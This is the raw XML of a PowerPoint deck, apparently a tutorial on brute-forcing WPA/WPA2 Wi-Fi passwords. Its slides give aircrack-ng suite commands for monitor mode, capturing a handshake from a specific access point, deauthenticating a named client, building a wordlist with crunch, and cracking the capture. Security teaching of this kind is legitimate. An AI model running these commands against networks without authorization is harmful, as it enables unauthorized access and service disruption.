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52" r:id="rId3"/>
    <p:sldId id="353" r:id="rId4"/>
    <p:sldId id="368" r:id="rId5"/>
    <p:sldId id="363" r:id="rId6"/>
    <p:sldId id="364" r:id="rId7"/>
    <p:sldId id="365" r:id="rId8"/>
    <p:sldId id="366" r:id="rId9"/>
    <p:sldId id="367" r:id="rId10"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId13"/>
      <p:bold r:id="rId14"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId15"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet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180" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="684" y="9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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng start wlan0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 4A:5D:36:06:CF:C9 --channel 11 --write  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wpa_handshakes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wlan0mon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Device: B0:35:9F:73:59:DD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 4 -a 4A:5D:36:06:CF:C9 -c B0:35:9F:73:59:DD  wlan0mon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>abcdefh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761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 smtClean="0"/>
              <a:t>crunch 8 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>abcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -o mypasswordlist.txt -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>abcdef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng wpa_handshakes-01.cap -w mypasswordlist.txt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1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4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dirty="0" smtClean="0"/>
              <a:t>Brute force WPA/WPA2</a:t>
            </a:r>
            <a:endParaRPr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Router Setting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596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08" y="278091"/>
            <a:ext cx="7562679" cy="429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5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38" y="220720"/>
            <a:ext cx="5784101" cy="454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1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Cracking using handshaking packets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2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56" y="202807"/>
            <a:ext cx="7899927" cy="465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928" y="0"/>
            <a:ext cx="64921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9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32" y="-59473"/>
            <a:ext cx="724583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9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31" y="1368182"/>
            <a:ext cx="6818873" cy="270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46213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62</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>23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Dosis</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Brute force WPA/WPA2</vt:lpstr>
      <vt:lpstr>Router Setting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cracking using handshaking packets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104</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-23T07:01:33Z</dcterms:modified>
</cp:coreProperties>
</file>